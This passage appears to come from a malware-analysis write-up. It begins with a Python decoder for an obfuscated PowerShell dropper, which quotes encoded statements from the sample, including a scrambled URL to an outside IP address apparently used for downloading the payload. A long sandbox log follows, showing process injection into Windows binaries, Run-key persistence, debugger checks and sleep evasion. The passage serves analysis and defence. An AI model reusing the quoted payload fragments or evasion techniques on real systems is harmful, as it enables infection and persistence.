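    This also catches the Innovative (Sonedkkets '...') calls, i.e. the
    statements the script hands to iex after decoding.
    """
    return [sonedkkets(m.group(1)) for m in CALL_RE.finditer(script)]


def decode_assignments(script: str) -> Dict[str, str]:
    """Map variable name -> decoded value for plain $Var=Sonedkkets '...' assignments."""
    return {m.group(1): sonedkkets(m.group(2)) for m in ASSIGN_RE.finditer(script)}


# Constructed input: statements copied from the command line quoted in the report.
# Only literals without runs of spaces are used, because the HTML rendering of the
# report collapsed repeated spaces in the others and they no longer decode cleanly.
FRAGMENT = (
    "$Beshaming=Sonedkkets ' UCsHeUr -MA.g.e,n.tB ';"
    "$Bladfod=Sonedkkets ' hOt t pP:a/S/,8 7,.C1T2v1L. 1R0R5L. 1 6O3H/.L i,cPeUn c.eJsA.,t.trf ';"
    "$Gruppemedlemmernes=Sonedkkets 'S> ';"
    "$Complexes=Sonedkkets 'EiReAxB ';"
    "Innovative (Sonedkkets 'E$,gPlLo.b aMl.: FDd e,vBaSr e i n d.utsStSr i e nSsP= "
    "$pG a.r d,eCnLp aVr,t.i,eUn e . s,uRbUsSt r i.n gE( 2O9A8.8s7 2 ,S2.6 1S1N8E)e ');"
)

if __name__ == "__main__":
    for name, value in decode_assignments(FRAGMENT).items():
        print(f"${name} = {value!r}")
    for statement in decode_calls(FRAGMENT)[4:]:
        print("iex ->", statement)
```

Running the block prints the four decoded variables and the final substring statement. To decode the whole script, pass the PowerShell command from the original .bat to decode_calls; with the rendered copy on this page, expect a handful of literals to come out misaligned for the reason given above, which is itself a useful tell that a copy has been through an HTML renderer.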
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_00007FFB200800BD pushad ; iretd 6_2_00007FFB200800C1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_04C545DD push ss; retn 0008h 10_2_04C545E2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_04C545E7 push ss; retn 0008h 10_2_04C545F2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_04C545F7 push ss; retn 0008h 10_2_04C54602
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_04C54607 push ss; retn 0008h 10_2_04C54612
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_04C53AE1 push ebx; retf 10_2_04C53AEA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_04C53AEF push ebx; retf 10_2_04C53AEA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_04C5A227 push esp; retn 0008h 10_2_04C5A231
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232C21AD pushad ; retf 0004h 12_2_232C223F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232CE060 push eax; retf 0008h 12_2_232CE06D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232CE074 pushfd ; retf 12_2_232CE075
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232C97A1 push es; iretd 12_2_232C97A8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F08CD push ecx; mov dword ptr [esp], ecx 12_2_232F08D6
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 14_2_06E667FC push es; retf 14_2_06E667FD
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 14_2_06E6ECCE push 0000006Eh; retf 14_2_06E6ECFA
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 14_2_06E738AE push eax; ret 14_2_06E738B0
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 14_2_06E6EC6C push es; retf 14_2_06E6EC78
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 14_2_06E6E85D push FFFFFFB4h; iretd 14_2_06E6E8AD
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 14_2_06E64DD0 push ebp; retf 14_2_06E64DD1
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 14_2_06E65952 push ecx; retf 14_2_06E65961
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 14_2_06E61922 push eax; iretd 14_2_06E61936
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AA08CD push ecx; mov dword ptr [esp], ecx 15_2_04AA08D6
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_02AAA35C push cs; ret 15_2_02AAA35F
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_02AA40E6 pushfd ; ret 15_2_02AA40E7
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_02ACC0CF push eax; ret 15_2_02ACC0D1
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_02AB4050 push ebx; ret 15_2_02AB4100
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_02ABC6EC push ss; iretd 15_2_02ABC6EF
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_02AB8648 push edi; retf 15_2_02AB8670
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_02AC2786 push edi; ret 15_2_02AC279B
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_02AC2790 push edi; ret 15_2_02AC279B
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_02ABAAC3 push ds; iretd 15_2_02ABAAB8
Source: C:\Windows\SysWOW64\AtBroker.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run S2U4LH
Source: C:\Windows\SysWOW64\AtBroker.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run S2U4LH
Source: C:\Program Files (x86)\Windows Mail\wab.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\AtBroker.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\AtBroker.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\AtBroker.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\AtBroker.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\AtBroker.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23331763 rdtsc 12_2_23331763
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9911
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9917
Source: C:\Windows\SysWOW64\AtBroker.exe Window / User API: threadDelayed 9852
Source: C:\Program Files (x86)\Windows Mail\wab.exe API coverage: 0.6 %
Source: C:\Windows\SysWOW64\AtBroker.exe API coverage: 3.4 %
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5164 Thread sleep count: 9917 > 30
Source: C:\Windows\SysWOW64\AtBroker.exe TID: 4384 Thread sleep count: 121 > 30
Source: C:\Windows\SysWOW64\AtBroker.exe TID: 4384 Thread sleep time: -242000s >= -30000s
Source: C:\Windows\SysWOW64\AtBroker.exe TID: 4384 Thread sleep count: 9852 > 30
Source: C:\Windows\SysWOW64\AtBroker.exe TID: 4384 Thread sleep time: -19704000s >= -30000s
Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe TID: 1208 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\AtBroker.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\AtBroker.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_02ABD1C0 FindFirstFileW,FindNextFileW,FindClose, 15_2_02ABD1C0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: powershell.exe, 00000006.00000002.20477959006.0000025A3ADF2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process queried: DebugPort
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\AtBroker.exe Process queried: DebugPort
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23331763 rdtsc 12_2_23331763
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_0338DB10 LdrInitializeThunk, 10_2_0338DB10
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EE328 mov eax, dword ptr fs:[00000030h] 12_2_232EE328
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EE328 mov eax, dword ptr fs:[00000030h] 12_2_232EE328
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EE328 mov eax, dword ptr fs:[00000030h] 12_2_232EE328
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233C3336 mov eax, dword ptr fs:[00000030h] 12_2_233C3336
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23328322 mov eax, dword ptr fs:[00000030h] 12_2_23328322
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23328322 mov eax, dword ptr fs:[00000030h] 12_2_23328322
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23328322 mov eax, dword ptr fs:[00000030h] 12_2_23328322
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331332D mov eax, dword ptr fs:[00000030h] 12_2_2331332D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2330E310 mov eax, dword ptr fs:[00000030h] 12_2_2330E310
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2330E310 mov eax, dword ptr fs:[00000030h] 12_2_2330E310
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2330E310 mov eax, dword ptr fs:[00000030h] 12_2_2330E310
